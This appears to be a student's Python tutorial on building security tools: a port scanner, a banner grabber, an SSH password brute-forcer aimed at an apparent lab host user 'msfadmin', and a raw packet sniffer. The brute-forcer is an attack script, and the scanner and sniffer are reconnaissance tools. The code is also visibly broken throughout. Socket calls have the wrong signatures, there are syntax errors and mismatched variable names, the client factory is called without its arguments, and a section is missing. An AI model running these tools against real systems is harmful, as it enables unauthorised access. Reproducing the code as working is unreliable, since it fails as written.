Open the socket package documentation to figure out the purpose of each function that is to be used.
1. Create a Socket connection
import socket
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = 'localhost'
port = '5000'
result = s.connect_ex(host, port)
print('Result is {}'.format(result))
print('it works')
s.close()
if __name__ == '__main__':
main()
2. Create a port scanner
import socket
from utils import timefunc
#Build a class to use it in multiple functions.
#In python a function is considered an object and a class declare how to build an object.
#Classes are useful because they help encapsulate information.
#[self]. helps to call objects (global variables and functions)
class Scanner:
#This function is used for an automatic assignment of attributes to the object
def __init__(self,ip):
self.ip = ip #creating a property for this object
self.open_ports = [];
def __repr__(self):
return 'Scanner: {}'.format(self.ip)
def scan(self, lowerport, upperport):
for port in range(lowerport, upperport + 1):
if self.is_open(port):
self.add_port(port)
def is_open(self,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = s.connect_ex(self.ip, port)
#print('Port {}: {}'.format(port,result))
s.close()
return result == 0
def write(self, filepath):
openport = map(str, self.open_ports)
with open(filepath, 'w') as f:
f.write('\n'.join(openport))
@timefunc
def main()
ip = '10.0.10.140'
scanner = Scanner(ip) # Creating an object of class Scanner. remember to create my class with a single attribute which is the IP
scanner.scan(1,100) # Can be from 1 to 6000 or whatever you want.
scanner.write('./open_ports')
#print(scanner.open_ports)
if __name__= '__main__':
main()
4. Banner reading from open ports
class Grabber:
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.settimeout(1000) # How many seconds do you wait for the port reading
self.socket.connect(self.ip, self.port)
def read(self, length=1024): # Help to obtain information of the port that is open
return self.socket.recv(length)
def close(self):
self.socket.close()
def main():
grabber = Grabber('10.0.13.231',22)
print(grabber.read())
grabber.close()
if __name__ = '__main__':
main()5. Combined the two previous classes
from utils import timefunc
from port_scanner import Scanner
from grabber import Grabber
@timefunc
def main():
ip = '10.0.13.231'
portfange = (1, 1001)
scanner = Scanner(ip)
scanner.scan(*portgrange)
for port in scanner.open_ports:
try:
grabber = Grabber(ip, port)
print(grabber.read())
grabber.close()
except Exception as e:
print("Error", e)
if __name__ = '__main__':
main()6. Brute forcing an SSH connection
import itertools as it
import string
from utils import timefunc
import paramiko
def create_client(ip, username, password):
client = paramiko.SSHClient()
client_policy = paramiko.AutoAddPolicy()
client.set_missing_host_key_policy(client_policy)
return client
class Brutes:
def __init__(self, charset, length, ip):
self.charset = charset
self.length = length
self.ip = ip
@timefunc
def crackit(self, username):
client = create_client()
for guess in self.guesses:
try:
# note: timeout is time to check.
client.connect(self.ip, username = username, password = guess, timeout = 0.5)
print('the password is {}'.format(guess))
return guess
except paramiko.authenticationException as e:
print('{} is not it'.format(guess))
finally:
client.close()
@property
def guesses(self):
for guess in it.product(self.charset, repeat=self.length):
yield ''.join(guess)
@timefunc
def main():
#charset = string.ascii_letters + string.digits
#charset = string.ascii_lowercase
charset = 'aspeb'#'pqrstuvwxyzabcdefghijklmno'
ip = '10.1.13.231'
brute = Brutes(charset, 4, ip)
password = brute.crackit(username= 'msfadmin')
if password:
print('found {}'.format(password))
if __name__== '__main__':
main()
7. Packet sniffing in python
Note: It is assumed that you are in and you are a root user permissions.
import socket
def main():
conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
while True:
raw_data, addr = conn.recvfrom(65500)
print(raw_data)
if __name__== '__main__':
main()
Note: ping a website address to see returned packets on the tracking screen
